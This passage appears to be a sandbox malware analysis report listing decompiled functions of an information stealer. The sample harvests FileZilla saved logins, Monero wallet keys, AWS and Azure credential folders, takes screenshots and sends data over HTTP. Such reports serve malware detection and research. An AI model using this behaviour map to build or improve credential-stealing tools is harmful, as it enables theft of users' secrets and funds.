                            • lstrcat.KERNEL32(?,profile: null), ref: 00690571
                            • lstrcat.KERNEL32(?,url: ), ref: 00690580
                            • lstrcat.KERNEL32(?,00000000), ref: 00690593
                            • lstrcat.KERNEL32(?,006A1678), ref: 006905A2
                            • lstrcat.KERNEL32(?,00000000), ref: 006905B5
                            • lstrcat.KERNEL32(?,006A167C), ref: 006905C4
                            • lstrcat.KERNEL32(?,login: ), ref: 006905D3
                            • lstrcat.KERNEL32(?,00000000), ref: 006905E6
                            • lstrcat.KERNEL32(?,006A1688), ref: 006905F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00690604
                            • lstrcat.KERNEL32(?,00000000), ref: 00690617
                            • lstrcat.KERNEL32(?,006A1698), ref: 00690626
                            • lstrcat.KERNEL32(?,006A169C), ref: 00690635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 0069068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: ab6d067bef2f332426d1a5168c3e98cd2fe85a50b628bacd9f2ed9c396386f46
                            • Instruction ID: 7b5a0d65b8e3a3298a640fa74b07b15a2a7c4df3f438fe0326eeb77fd5e65f2b
                            • Opcode Fuzzy Hash: ab6d067bef2f332426d1a5168c3e98cd2fe85a50b628bacd9f2ed9c396386f46
                            • Instruction Fuzzy Hash: D7D11A72910108ABDF48FBE4DD96EEE73BEFF15300F444518F502A6491DE34AA06CBA6
                            Function 00685960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                              • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006859F8
                            • StrCmpCA.SHLWAPI(?,013AE3F0), ref: 00685A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00685B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,013AE360,00000000,?,013A9D38,00000000,?,006A1A1C), ref: 00685E71
                            • lstrlen.KERNEL32(00000000), ref: 00685E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00685E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00685E9A
                            • lstrlen.KERNEL32(00000000), ref: 00685EAF
                            • lstrlen.KERNEL32(00000000), ref: 00685ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00685EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00685F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00685F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00685F4C
                            • InternetCloseHandle.WININET(00000000), ref: 00685FB0
                            • InternetCloseHandle.WININET(00000000), ref: 00685FBD
                            • HttpOpenRequestA.WININET(00000000,013AE3A0,?,013ADE28,00000000,00000000,00400100,00000000), ref: 00685BF8
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • InternetCloseHandle.WININET(00000000), ref: 00685FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: 980511ae3e52c6965957af8ada7fceac19e16f648f53338d5d5d5147a6f7892d
                            • Instruction ID: 6f7a9944320dd372c2a16bade4873928bffb9052d9775d4ed3d65f641738b680
                            • Opcode Fuzzy Hash: 980511ae3e52c6965957af8ada7fceac19e16f648f53338d5d5d5147a6f7892d
                            • Instruction Fuzzy Hash: 3F12DE71820128AADF55EBE0DD95FEEB3BEBF14700F50419DB10A62491DF702A49CFA9
                            Function 0068CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,013A9C78,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068CF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0068D0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0068D0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D208
                            • lstrcat.KERNEL32(?,006A1478), ref: 0068D217
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D22A
                            • lstrcat.KERNEL32(?,006A147C), ref: 0068D239
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D24C
                            • lstrcat.KERNEL32(?,006A1480), ref: 0068D25B
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D26E
                            • lstrcat.KERNEL32(?,006A1484), ref: 0068D27D
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D290
                            • lstrcat.KERNEL32(?,006A1488), ref: 0068D29F
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D2B2
                            • lstrcat.KERNEL32(?,006A148C), ref: 0068D2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 0068D2D4
                            • lstrcat.KERNEL32(?,006A1490), ref: 0068D2E3
                              • Part of subcall function 0069A820: lstrlen.KERNEL32(00684F05,?,?,00684F05,006A0DDE), ref: 0069A82B
                              • Part of subcall function 0069A820: lstrcpy.KERNEL32(006A0DDE,00000000), ref: 0069A885
                            • lstrlen.KERNEL32(?), ref: 0068D32A
                            • lstrlen.KERNEL32(?), ref: 0068D339
                              • Part of subcall function 0069AA70: StrCmpCA.SHLWAPI(013A8A50,0068A7A7,?,0068A7A7,013A8A50), ref: 0069AA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 0068D3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: a1f9a7b1dbd4e4ba1a07af192f7676b926738e4023632352e988de2bbf4beff8
                            • Instruction ID: abeb258d356049851f5ac450ff7c8f6572f6b76625535eccaf4380018c3b3f23
                            • Opcode Fuzzy Hash: a1f9a7b1dbd4e4ba1a07af192f7676b926738e4023632352e988de2bbf4beff8
                            • Instruction Fuzzy Hash: 7EE12B71910108ABCF48FBE0DD96EEE73BEBF14304F104159F506A6491DE35AE06CBAA
                            Function 0068C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013AC898,00000000,?,006A144C,00000000,?,?), ref: 0068CA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0068CA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0068CA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0068CAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0068CAD9
                            • StrStrA.SHLWAPI(?,013ACA60,006A0B52), ref: 0068CAF7
                            • StrStrA.SHLWAPI(00000000,013AC820), ref: 0068CB1E
                            • StrStrA.SHLWAPI(?,013AD0F8,00000000,?,006A1458,00000000,?,00000000,00000000,?,013A8A70,00000000,?,006A1454,00000000,?), ref: 0068CCA2
                            • StrStrA.SHLWAPI(00000000,013AD178), ref: 0068CCB9
                              • Part of subcall function 0068C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0068C871
                              • Part of subcall function 0068C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0068C87C
                            • StrStrA.SHLWAPI(?,013AD178,00000000,?,006A145C,00000000,?,00000000,013A8A20), ref: 0068CD5A
                            • StrStrA.SHLWAPI(00000000,013A88A0), ref: 0068CD71
                              • Part of subcall function 0068C820: lstrcat.KERNEL32(?,006A0B46), ref: 0068C943
                              • Part of subcall function 0068C820: lstrcat.KERNEL32(?,006A0B47), ref: 0068C957
                              • Part of subcall function 0068C820: lstrcat.KERNEL32(?,006A0B4E), ref: 0068C978
                            • lstrlen.KERNEL32(00000000), ref: 0068CE44
                            • CloseHandle.KERNEL32(00000000), ref: 0068CE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: 1668e509e5c45c32e8c20a6e70a8fc24b9e0ce67e379f86fe270df06d29ea442
                            • Instruction ID: e2fe4eeaae8f83b3bbc8cd9d9c8b9c0ab3f386eb7684efb792e30476f3019199
                            • Opcode Fuzzy Hash: 1668e509e5c45c32e8c20a6e70a8fc24b9e0ce67e379f86fe270df06d29ea442
                            • Instruction Fuzzy Hash: 9FE1EB71810108ABDF58EBE4DD95EEEB7BEBF14300F40415DF10666591DF306A4ACBA9
                            Function 00698320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • RegOpenKeyExA.ADVAPI32(00000000,013AAAC0,00000000,00020019,00000000,006A05B6), ref: 006983A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00698426
                            • wsprintfA.USER32 ref: 00698459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0069847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0069848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00698499
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: 82fbc7d00bd7dc164c9c02791cf7797ef0c3f761ecbacee7249462cca7be2276
                            • Instruction ID: efcb057fe12393bff11fbfda853cf81b0561d7ec0854b53f26817e1981f2d8a9
                            • Opcode Fuzzy Hash: 82fbc7d00bd7dc164c9c02791cf7797ef0c3f761ecbacee7249462cca7be2276
                            • Instruction Fuzzy Hash: 6F81197191011CABEB68DB90CD95FEAB7BDBF08704F008298E109A6580DF716A85CFE5
                            Function 00694D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00694DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00694DCD
                              • Part of subcall function 00694910: wsprintfA.USER32 ref: 0069492C
                              • Part of subcall function 00694910: FindFirstFileA.KERNEL32(?,?), ref: 00694943
                            • lstrcat.KERNEL32(?,00000000), ref: 00694E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00694E59
                              • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FDC), ref: 00694971
                              • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FE0), ref: 00694987
                              • Part of subcall function 00694910: FindNextFileA.KERNEL32(000000FF,?), ref: 00694B7D
                              • Part of subcall function 00694910: FindClose.KERNEL32(000000FF), ref: 00694B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00694EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00694EE5
                              • Part of subcall function 00694910: wsprintfA.USER32 ref: 006949B0
                              • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A08D2), ref: 006949C5
                              • Part of subcall function 00694910: wsprintfA.USER32 ref: 006949E2
                              • Part of subcall function 00694910: PathMatchSpecA.SHLWAPI(?,?), ref: 00694A1E
                              • Part of subcall function 00694910: lstrcat.KERNEL32(?,013AE320), ref: 00694A4A
                              • Part of subcall function 00694910: lstrcat.KERNEL32(?,006A0FF8), ref: 00694A5C
                              • Part of subcall function 00694910: lstrcat.KERNEL32(?,?), ref: 00694A70
                              • Part of subcall function 00694910: lstrcat.KERNEL32(?,006A0FFC), ref: 00694A82
                              • Part of subcall function 00694910: lstrcat.KERNEL32(?,?), ref: 00694A96
                              • Part of subcall function 00694910: CopyFileA.KERNEL32(?,?,00000001), ref: 00694AAC
                              • Part of subcall function 00694910: DeleteFileA.KERNEL32(?), ref: 00694B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: 5368c47458823a60eecc7707a919baacc5253f41b03c4fe8fb9210e002c7002e
                            • Instruction ID: 304cdcca087fdd609f5e4c42fc4c7245384ff641a56bef6a592560d45766ab39
                            • Opcode Fuzzy Hash: 5368c47458823a60eecc7707a919baacc5253f41b03c4fe8fb9210e002c7002e
                            • Instruction Fuzzy Hash: 0A41D7BA94020867CB54F7B0DC47FDD733DAB25704F004598B645A60C1EEB49BC9CB92
                            Function 00699010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0069906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: 29998bb1082106a528458819ae243223b2866c2c5e3afb183c3698b94150c29a
                            • Instruction ID: b7917b030109f85454c69e62425d2c74da53e66283b06753eeff3831c5abc2df
                            • Opcode Fuzzy Hash: 29998bb1082106a528458819ae243223b2866c2c5e3afb183c3698b94150c29a
                            • Instruction Fuzzy Hash: 0D71CAB5910208ABDB08EBE4DD89FEEB7BDFB48704F108518F515EB690DB34A905CB61
                            Function 00692E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 006931C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 0069335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 006934EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
